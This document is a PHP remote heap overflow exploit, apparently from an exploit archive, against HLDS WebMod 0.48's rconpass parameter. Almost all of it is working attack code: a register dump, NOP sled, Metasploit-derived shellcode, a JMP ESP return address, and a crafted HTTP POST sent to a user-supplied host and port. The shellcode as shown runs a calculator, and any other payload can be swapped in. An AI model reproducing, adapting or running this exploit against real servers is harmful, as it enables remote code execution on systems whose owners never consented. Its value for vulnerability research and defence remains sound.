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HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit
======================================================== HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit ======================================================== <?php ## HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit ## Tested on HLDS Launcher, WebMod 0.48, Windows XP SP2 Hebrew ## shir, skod.uk [at] gmail [dot] com ## 17/12/2007 ## Registers (rconpass = "A"x16444): # EAX 67E04955 w_mm.67E04955 # ECX 41414141 # EDX 41414141 # EBX 0000000A # ESP 08F650FC # EBP 08F726D4 # ESI 08F72734 # EDI 00000000 # EIP 67E0498C w_mm.67E0498C ######### error_reporting(7); ini_set("max_execution_time",0); if($_SERVER['argv'][1] && $_SERVER['argv'][2]) { $host = $_SERVER['argv'][1]; $port = $_SERVER['argv'][2]; } else { echo ("\r\nHLDS WebMod 0.48 Remote Heap Overflow Exploit\r\n"); echo ("Written by shir, skod.uk\x40gmail\x2Ecom\r\n"); echo ("Usage: php {$_SERVER['argv'][0]} IP PORT\r\n"); echo ("Example: php {$_SERVER['argv'][0]} 27015\r\n"); exit(); } echo "[~] Packing...\r\n"; $scode = "\x66\x83\xC0\x04\xFF\xE0"; /*ADD EAX, 4 => JMP EAX*/ # win32_bind - Calc executer. Metasploit.com $shellcode = "\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4". "\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1". "\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed". "\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9". "\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2". "\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80". "\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f". "\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc". "\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0". "\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4"; $evilcode = str_repeat("\x90", 100); $evilcode.= $shellcode; $evilcode.= str_repeat("\x90", 16156-(strlen($shellcode))); $evilcode.= "\xFD\xAF\x6A\x07"; #076AAFFD FFE4 => JMP ESP (cstrike\dlls\mp.dll) $evilcode.= str_repeat("\x90", 60-(strlen($scode))); $evilcode.= $scode; $evilcode.= str_repeat("\x90", 8); $evilcode.= str_repeat("0", 72); $evilcode.= str_repeat("%00", 4); $evilcode.= str_repeat("0", 4); $evilcode.= "\x20\xF0\xFD\x7F"; #Windows PEB Lock Pointer $evilcode.= str_repeat("%00", 8); $post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass"; $pack = "POST /auth.w?redir= HTTP/1.1\r\n"; $pack.= "Host: {$host}:{$port}\r\n"; $pack.= "User-Agent: Mozilla/5.0\r\n"; $pack.= "Accept: */*\r\n"; $pack.= "Accept-Language: en-us,en;q=0.5\r\n"; $pack.= "Accept-Encoding: gzip,deflate\r\n"; $pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $pack.= "Keep-Alive: 300\r\n"; $pack.= "Connection: keep-alive\r\n"; $pack.= "Content-Type: application/x-www-form-urlencoded\r\n"; $pack.= "Content-Length: ". strlen($post) ."\r\n\r\n" . $post; echo "[~] Sending...\r\n"; $sock = @fsockopen($host, $port, $errno, $errstr, 10); if ($errstr) echo("[-] Can't connect {$host}:{$port}\r\n"); else { fputs($sock, $pack); $tmp = fgets($sock,1024); if(strstr($tmp, '<')) echo "[-] Failed, you better try again.\r\n"; else echo "[+] Shellcode should be executed.\r\n"; fclose($sock); } ?> # 0day.today [2024-12-26] #